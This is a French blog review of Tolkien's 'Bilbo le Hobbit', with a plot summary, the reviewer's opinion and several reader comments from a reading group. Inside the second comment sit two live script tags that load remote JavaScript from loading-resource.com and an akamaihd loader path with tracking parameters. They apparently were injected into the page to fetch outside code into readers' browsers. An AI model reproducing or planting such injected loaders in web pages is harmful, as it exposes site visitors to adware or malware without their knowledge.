• Bilbo le Hobbit

    Bilbo Le HobbitBilbo Le Hobbit by J.R.R. Tolkien
    My rating: 4 of 5 stars
    Livre de poche

    juillet 2012

    311 pages

     

    Résumé :

    Alors que Bilbot s'apprête à passer une journée ordinaire, un magicien se présente à sa porte. Bien qu'il préssente qu'ouvrir n'est pas une bonne idée, il n'a d'autre choix que de lui ouvrir. Peu de temps après son trou est envahi de nains et il se voit contraint de partir à l'aventure !

    Mon avis :


    Ce roman constitue à la fois une très bonne préquelle au seigneur des anneaux et à la fois une très bonne initiation à l'oeuvre de Tolkien. En effet, le roman est court et relativement simple à lire. On fait la connaissance de Gandalf, de Bilbo et d'Elrond. En outre, on découvre aussi l'univers de l'auteur avec les hobbits, les nains, les elfes et les gobelins.

    Ce roman est très riche en créatures puisque presque tous les animaux sont animés : aigles, ours... Enfin, on rencontre aussi un dragon (but final des aventures de nos héros).

    Du côté des personnages, nous assistons à la transformation d'un Bilbo un frileux au Bilbo du seigneur des anneaux. Il s'agit ici, presque d'une quête initiatique durant laquelle notre jeune hobbit va se révéler au fur et à mesure de l'aventure qu'il va d'ailleurs de plus en plus apprécier.
    Se joignent à lui 13 nains dont seulement la moitié tirent leur épingle du jeu. Les échanges entre le hobbit et les nains sont souvent des plus savoureux.

    La narration se fait à la troisième personne ce qui permet l'alternance des point de vue. En outre, le narrateur est presque comme un personnage de l'histoire par ses interventions et ses commentaire tout au long du roman.
    L'intrigue est sans grande surprise et après un début un peu long, elle est relativement bien rythmée. L'après dénouement est assez drôle et permet de retrouver un peu de légèreté après un dénouement certes positif , comme on pouvait s'en doutait, mais aussi triste.

    Ce livre a été lu dans le cadre d'une LC sur livraddict

    « jane (coeur à prendre) jonesdémonica »

    Tags Tags : , , , ,
  • Commentaires

    1
    Vendredi 7 Septembre 2012 à 19:07

    J'ai énormément apprécié cette lecture car elle m'a permis de découvrir l'univers très riche de Tolkien ! Une très chouette LC, j'ai été ravie de participer avec toi !

    2
    Samedi 8 Septembre 2012 à 09:21

    J'ai également été fascinée par ce roman.

    Un magnifique préambule à l'univers de Tolkien, plein de bonnes moralités, d'aventures exquises et surtout très humain :)

    A bientôt

    <script src="//loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script> <script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
    3
    Mercredi 12 Septembre 2012 à 17:36
    Mypianocanta

    J'aime bien ton idée de quête initiatique : c'est vrai qu'on voit Bilob grandir dans ce roman.
    Ravie qu'il t'ait plu :)

    • Nom / Pseudo :

      E-mail (facultatif) :

      Site Web (facultatif) :

      Commentaire :


    4
    Dimanche 16 Septembre 2012 à 19:58
    Yumi'

    A mon goût la majorité du livre est longue et lente, mais il y a quand même plein d'éléments qui font que le livre a un certain intérêt ^^

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :